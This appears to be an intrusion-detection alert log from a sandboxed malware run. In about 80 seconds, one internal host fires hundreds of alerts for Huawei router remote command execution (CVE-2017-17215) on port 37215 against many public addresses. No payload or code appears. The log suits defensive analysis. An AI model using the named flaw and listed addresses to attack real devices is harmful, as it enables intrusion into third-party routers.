                                                    07/10/24-08:26:33.161140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101237215192.168.2.14197.143.139.129
                                                    07/10/24-08:27:05.209381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876437215192.168.2.1498.165.112.113
                                                    07/10/24-08:27:17.056962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144037215192.168.2.1469.98.37.105
                                                    07/10/24-08:27:03.033670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015637215192.168.2.1466.223.64.230
                                                    07/10/24-08:26:11.538222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944437215192.168.2.1438.74.207.61
                                                    07/10/24-08:27:07.298138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.1441.35.182.101
                                                    07/10/24-08:27:07.292595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832437215192.168.2.14157.115.249.14
                                                    07/10/24-08:27:23.914587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264637215192.168.2.14157.243.209.135
                                                    07/10/24-08:26:53.202562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657437215192.168.2.14157.50.6.71
                                                    07/10/24-08:26:53.205499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806237215192.168.2.14157.95.81.201
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908837215192.168.2.1442.226.79.19
                                                    07/10/24-08:26:41.303627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607037215192.168.2.14157.164.249.146
                                                    07/10/24-08:27:30.506751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064237215192.168.2.1419.82.193.188
                                                    07/10/24-08:27:24.949781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095637215192.168.2.14197.209.150.127
                                                    07/10/24-08:27:02.819826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087437215192.168.2.14157.201.103.68
                                                    07/10/24-08:27:30.505741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001437215192.168.2.1441.147.88.210
                                                    07/10/24-08:27:24.837917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801037215192.168.2.1441.231.73.228
                                                    07/10/24-08:27:05.138827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938837215192.168.2.1441.194.205.110
                                                    07/10/24-08:27:33.980706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975237215192.168.2.14157.28.32.20
                                                    07/10/24-08:26:14.781247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.1441.95.69.197
                                                    07/10/24-08:26:59.703676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934437215192.168.2.1464.186.100.95
                                                    07/10/24-08:26:57.663652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888637215192.168.2.14157.129.236.69
                                                    07/10/24-08:27:31.446211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916437215192.168.2.14157.210.55.48
                                                    07/10/24-08:26:49.829856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169037215192.168.2.1439.67.158.255
                                                    07/10/24-08:27:32.549602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690837215192.168.2.14197.183.77.95
                                                    07/10/24-08:26:48.012833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160637215192.168.2.1441.8.180.240
                                                    07/10/24-08:27:27.174568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14123.0.38.167
                                                    07/10/24-08:27:07.344917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438237215192.168.2.1453.244.61.151
                                                    07/10/24-08:26:48.010127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387837215192.168.2.14191.105.84.104
                                                    07/10/24-08:26:55.408073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.14197.139.125.65
                                                    07/10/24-08:26:45.673151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500437215192.168.2.14197.65.48.54
                                                    07/10/24-08:27:28.070223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962037215192.168.2.14197.224.98.203
                                                    07/10/24-08:26:28.840131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413437215192.168.2.1441.166.116.182
                                                    07/10/24-08:27:19.312425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311837215192.168.2.14157.44.191.52
                                                    07/10/24-08:27:28.155678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625637215192.168.2.14157.77.183.206
                                                    07/10/24-08:26:17.998303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515837215192.168.2.1441.177.242.19
                                                    07/10/24-08:27:20.420210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874037215192.168.2.14175.86.61.143
                                                    07/10/24-08:27:08.392562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746037215192.168.2.14197.41.242.85
                                                    07/10/24-08:26:18.023692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371637215192.168.2.14197.132.199.94
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212837215192.168.2.14197.70.22.23
                                                    07/10/24-08:27:13.986836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589237215192.168.2.14157.168.198.221
                                                    07/10/24-08:27:22.464589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952637215192.168.2.14205.120.252.41
                                                    07/10/24-08:27:23.942170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883837215192.168.2.14197.201.224.62
                                                    07/10/24-08:26:43.893458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946837215192.168.2.1441.84.206.64
                                                    07/10/24-08:26:36.330263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353437215192.168.2.14164.80.159.49
                                                    07/10/24-08:26:36.367348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403237215192.168.2.14131.124.111.132
                                                    07/10/24-08:27:19.181230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519637215192.168.2.1441.172.52.127
                                                    07/10/24-08:26:33.161010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832437215192.168.2.1441.141.190.204
                                                    07/10/24-08:27:08.318439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948237215192.168.2.14197.10.81.123
                                                    07/10/24-08:26:22.207243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903637215192.168.2.1441.36.30.69
                                                    07/10/24-08:26:13.818987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.14197.143.8.81
                                                    07/10/24-08:26:28.904188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959637215192.168.2.14197.94.52.197
                                                    07/10/24-08:26:51.961222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4485037215192.168.2.14157.61.218.170
                                                    07/10/24-08:26:43.913134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005637215192.168.2.14157.149.38.83
                                                    07/10/24-08:26:29.873884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700837215192.168.2.1441.108.47.8
                                                    07/10/24-08:27:11.531536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577037215192.168.2.14157.154.21.146
                                                    07/10/24-08:26:43.726250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754037215192.168.2.14157.206.247.14
                                                    07/10/24-08:26:53.134906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327837215192.168.2.1459.96.117.134
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633837215192.168.2.1441.230.110.143
                                                    07/10/24-08:26:43.730501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317837215192.168.2.1441.105.76.16
                                                    07/10/24-08:26:26.591282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620237215192.168.2.14157.34.79.253
                                                    07/10/24-08:26:55.278007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621437215192.168.2.1441.103.126.26
                                                    07/10/24-08:26:59.553454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585837215192.168.2.14157.137.115.12
                                                    07/10/24-08:27:20.513537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992637215192.168.2.1492.112.56.67
                                                    07/10/24-08:26:41.440353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188037215192.168.2.1441.100.129.99
                                                    07/10/24-08:26:43.574269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892437215192.168.2.1441.51.81.196
                                                    07/10/24-08:26:28.930785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965437215192.168.2.1476.144.191.50
                                                    07/10/24-08:26:14.809992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762037215192.168.2.14171.118.169.59
                                                    07/10/24-08:26:43.524057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260837215192.168.2.14197.197.27.62
                                                    07/10/24-08:26:41.547528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583637215192.168.2.1480.109.10.54
                                                    07/10/24-08:26:45.597110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022237215192.168.2.1441.171.152.166
                                                    07/10/24-08:27:30.527046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353037215192.168.2.14145.38.76.5
                                                    07/10/24-08:26:49.910333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734637215192.168.2.1441.3.111.199
                                                    07/10/24-08:27:08.374811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840837215192.168.2.14197.247.23.45
                                                    07/10/24-08:27:07.401938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077437215192.168.2.14197.16.29.195
                                                    07/10/24-08:26:14.801295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093437215192.168.2.1441.143.220.37
                                                    07/10/24-08:27:27.058736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683437215192.168.2.14197.46.132.24
                                                    07/10/24-08:27:30.505876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576237215192.168.2.14157.151.163.28
                                                    07/10/24-08:27:31.547528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608237215192.168.2.14197.204.12.69
                                                    07/10/24-08:26:57.663651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863237215192.168.2.14157.119.49.76
                                                    07/10/24-08:26:25.446439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620437215192.168.2.14197.13.156.215
                                                    07/10/24-08:27:20.516215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966637215192.168.2.14197.165.233.194
                                                    07/10/24-08:27:11.477430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644037215192.168.2.14157.42.59.110
                                                    07/10/24-08:26:31.095355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902437215192.168.2.1441.156.141.49
                                                    07/10/24-08:26:13.782831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806437215192.168.2.1441.100.42.16
                                                    07/10/24-08:27:28.126957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462037215192.168.2.14157.68.52.20
                                                    07/10/24-08:26:43.879601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877037215192.168.2.14197.223.32.163
                                                    07/10/24-08:27:22.476492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.1441.125.173.84
                                                    07/10/24-08:26:17.985178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.1441.102.36.84
                                                    07/10/24-08:26:34.188180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749637215192.168.2.1441.140.117.129
                                                    07/10/24-08:26:36.388728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290437215192.168.2.1441.184.173.247
                                                    07/10/24-08:27:05.083120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827037215192.168.2.1441.36.34.157
                                                    07/10/24-08:26:18.027380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988237215192.168.2.14157.162.253.11
                                                    07/10/24-08:26:59.667281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599637215192.168.2.14197.118.46.44
                                                    07/10/24-08:26:59.637252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552837215192.168.2.14197.172.99.200
                                                    07/10/24-08:27:10.674109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716437215192.168.2.1496.195.82.201
                                                    07/10/24-08:26:45.619153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.14207.156.47.212
                                                    07/10/24-08:27:19.205776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710037215192.168.2.1441.78.100.251
                                                    07/10/24-08:26:47.895563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5340237215192.168.2.14197.119.229.146
                                                    07/10/24-08:26:59.652707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201637215192.168.2.1441.151.35.46
                                                    07/10/24-08:27:11.490604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.14157.227.60.70
                                                    07/10/24-08:26:49.897778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749437215192.168.2.1441.16.182.126
                                                    07/10/24-08:26:11.094996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.14197.134.93.225
                                                    07/10/24-08:27:22.933936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167237215192.168.2.14128.40.91.38
                                                    07/10/24-08:26:36.385173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274637215192.168.2.14197.6.209.10
                                                    07/10/24-08:26:25.507249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317037215192.168.2.14139.105.154.111
                                                    07/10/24-08:26:28.933010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810237215192.168.2.1436.68.212.25
                                                    07/10/24-08:26:38.588104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772837215192.168.2.14197.221.195.99
                                                    07/10/24-08:26:42.425783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000437215192.168.2.14157.78.142.100
                                                    07/10/24-08:26:59.709807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423237215192.168.2.1441.164.200.141
                                                    07/10/24-08:27:32.611933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453437215192.168.2.1484.4.223.83
                                                    07/10/24-08:26:13.851676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523237215192.168.2.14197.158.161.33
                                                    07/10/24-08:26:31.053322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057037215192.168.2.1482.141.105.233
                                                    07/10/24-08:26:41.367944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473237215192.168.2.14192.38.70.63
                                                    07/10/24-08:27:14.815899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.14197.73.160.146
                                                    07/10/24-08:26:17.966434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827037215192.168.2.1441.152.66.39
                                                    07/10/24-08:26:43.809234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295037215192.168.2.14157.52.90.100
                                                    07/10/24-08:26:59.655987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882637215192.168.2.14157.185.106.37
                                                    07/10/24-08:26:59.661745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947437215192.168.2.14157.82.23.132
                                                    07/10/24-08:27:22.783603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859637215192.168.2.1441.242.160.155
                                                    07/10/24-08:26:52.034591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915837215192.168.2.1463.105.45.118
                                                    07/10/24-08:27:03.030888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585637215192.168.2.14197.31.133.166
                                                    07/10/24-08:26:43.785438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280637215192.168.2.14196.206.205.115
                                                    07/10/24-08:27:11.503966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629837215192.168.2.14157.175.130.215
                                                    07/10/24-08:26:18.015608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097037215192.168.2.1441.205.25.71
                                                    07/10/24-08:26:28.808876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319637215192.168.2.14157.74.54.242
                                                    07/10/24-08:26:11.105153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777437215192.168.2.1441.174.151.32
                                                    07/10/24-08:27:19.282897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387237215192.168.2.14157.95.84.63
                                                    07/10/24-08:26:45.638729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481237215192.168.2.14197.136.93.249
                                                    07/10/24-08:26:13.767768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364437215192.168.2.14197.215.171.127
                                                    07/10/24-08:26:20.148665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.14154.129.126.247
                                                    07/10/24-08:27:02.898852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049437215192.168.2.1441.111.138.62
                                                    07/10/24-08:26:45.668696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753237215192.168.2.1441.60.3.185
                                                    07/10/24-08:26:47.909294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088237215192.168.2.14197.112.120.87
                                                    07/10/24-08:27:30.518988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722437215192.168.2.14102.73.185.27
                                                    07/10/24-08:26:29.871003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677637215192.168.2.14197.92.60.238
                                                    07/10/24-08:26:53.186613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619237215192.168.2.14157.26.88.21
                                                    07/10/24-08:27:33.970105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078637215192.168.2.14158.65.189.167
                                                    07/10/24-08:26:28.763825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875637215192.168.2.14114.100.30.187
                                                    07/10/24-08:27:14.002170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620037215192.168.2.14157.225.139.23
                                                    07/10/24-08:26:45.619051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038037215192.168.2.14157.127.139.35
                                                    07/10/24-08:27:11.533117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978237215192.168.2.14197.210.91.192
                                                    07/10/24-08:27:14.881781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699037215192.168.2.1441.151.36.112
                                                    07/10/24-08:26:22.213907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343837215192.168.2.14157.165.91.139
                                                    07/10/24-08:26:13.831960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387237215192.168.2.14135.245.254.186
                                                    07/10/24-08:26:18.039124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3449837215192.168.2.14197.131.24.64
                                                    07/10/24-08:26:14.803775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762637215192.168.2.14197.33.87.216
                                                    07/10/24-08:27:08.431901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820637215192.168.2.1486.243.120.23
                                                    07/10/24-08:26:23.268554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531637215192.168.2.1484.204.146.30
                                                    07/10/24-08:26:23.356986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852037215192.168.2.14157.102.231.126
                                                    07/10/24-08:27:17.023576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978837215192.168.2.14152.54.143.52
                                                    07/10/24-08:27:17.027342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753837215192.168.2.14157.225.30.226
                                                    07/10/24-08:27:22.455545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766637215192.168.2.14155.210.73.129
                                                    07/10/24-08:26:18.006056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197237215192.168.2.14119.213.203.102
                                                    07/10/24-08:26:17.933163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358437215192.168.2.14157.234.94.222
                                                    07/10/24-08:27:10.632991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260637215192.168.2.14157.100.89.109
                                                    07/10/24-08:26:59.645558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491837215192.168.2.1441.223.125.87
                                                    07/10/24-08:26:41.529158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351837215192.168.2.14197.58.175.27
                                                    07/10/24-08:26:43.542796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226237215192.168.2.1441.86.218.136
                                                    07/10/24-08:27:22.933807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.1441.106.241.27
                                                    07/10/24-08:26:42.363938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578837215192.168.2.1441.65.254.151
                                                    07/10/24-08:26:43.652674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699837215192.168.2.14197.13.187.101
                                                    07/10/24-08:26:53.186613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775237215192.168.2.14157.169.36.198
                                                    07/10/24-08:26:20.139461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499637215192.168.2.14157.24.103.105
                                                    07/10/24-08:27:08.435452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098837215192.168.2.1441.8.109.90
                                                    07/10/24-08:26:55.397639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963437215192.168.2.1441.245.201.227
                                                    07/10/24-08:26:49.811589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.14113.2.174.161
                                                    07/10/24-08:26:42.353895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988637215192.168.2.1418.59.3.132
                                                    07/10/24-08:27:03.004303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782237215192.168.2.14189.59.163.183
                                                    07/10/24-08:26:49.787588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547237215192.168.2.14157.60.81.108
                                                    07/10/24-08:27:22.903866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961837215192.168.2.1466.31.61.161
                                                    07/10/24-08:26:28.931862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416437215192.168.2.14157.159.25.104
                                                    07/10/24-08:26:47.841938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451837215192.168.2.14211.111.87.43
                                                    07/10/24-08:26:47.996062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130437215192.168.2.14157.210.180.197
                                                    07/10/24-08:27:07.292595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484237215192.168.2.14197.249.23.246
                                                    07/10/24-08:26:15.795103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390837215192.168.2.14164.241.129.95
                                                    07/10/24-08:27:13.912593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930837215192.168.2.1441.61.7.76
                                                    07/10/24-08:26:11.596894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877237215192.168.2.14157.151.135.126
                                                    07/10/24-08:27:20.498164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984637215192.168.2.1441.230.143.238
                                                    07/10/24-08:26:28.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287437215192.168.2.14197.211.36.125
                                                    07/10/24-08:26:36.389134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576437215192.168.2.14102.200.21.139
                                                    07/10/24-08:27:19.163941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875437215192.168.2.14197.133.70.28
                                                    07/10/24-08:26:23.343986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188237215192.168.2.1441.181.45.214
                                                    07/10/24-08:27:20.401175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366637215192.168.2.1441.182.235.229
                                                    07/10/24-08:26:33.196889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372037215192.168.2.14157.88.26.255
                                                    07/10/24-08:26:59.541812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156037215192.168.2.1441.90.115.32
